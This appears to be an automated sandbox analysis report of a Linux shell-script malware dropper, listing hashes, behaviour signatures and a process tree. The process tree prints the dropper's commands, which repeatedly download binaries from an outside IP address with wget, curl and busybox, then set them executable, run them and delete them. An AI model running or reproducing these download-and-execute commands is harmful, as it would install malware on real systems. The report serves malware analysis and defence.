Analysis
-
max time kernel
69s -
max time network
74s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 699 chmod 745 chmod 879 chmod 885 chmod 917 chmod 943 chmod 727 chmod 859 chmod 911 chmod 765 chmod 788 chmod 931 chmod 691 chmod 806 chmod 826 chmod 937 chmod 873 chmod 899 chmod 776 chmod 891 chmod 905 chmod 711 chmod 835 chmod 841 chmod 847 chmod 853 chmod 867 chmod 923 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 693 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 700 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 712 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 728 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 746 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 766 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 789 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 807 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 828 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 836 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 842 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 848 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 854 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ 860 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc 868 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS 874 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj 880 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr 886 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 892 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 900 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo 906 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH 912 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 918 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ 924 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd 932 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ 938 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p 944 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl File opened for modification /tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4 curl File opened for modification /tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH curl File opened for modification /tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7 curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9 curl File opened for modification /tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc curl File opened for modification /tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd curl File opened for modification /tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p curl File opened for modification /tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ curl File opened for modification /tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS curl File opened for modification /tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo curl File opened for modification /tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj curl File opened for modification /tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ curl
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:660
-
/bin/rm/bin/rm bins.sh2⤵PID:667
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:686
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:694
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:695
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:698
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:700
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:701
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:702
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:708
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:712
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:714
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:723
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:729
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:730
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:742
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:762
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:767
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:775
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:778
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:779
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:785
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:791
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:792
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:801
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:809
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:821
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:829
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:830
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:834
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:838
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:840
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:843
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:844
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:846
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:849
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:850
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:852
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:858
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:866
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:872
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:878
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
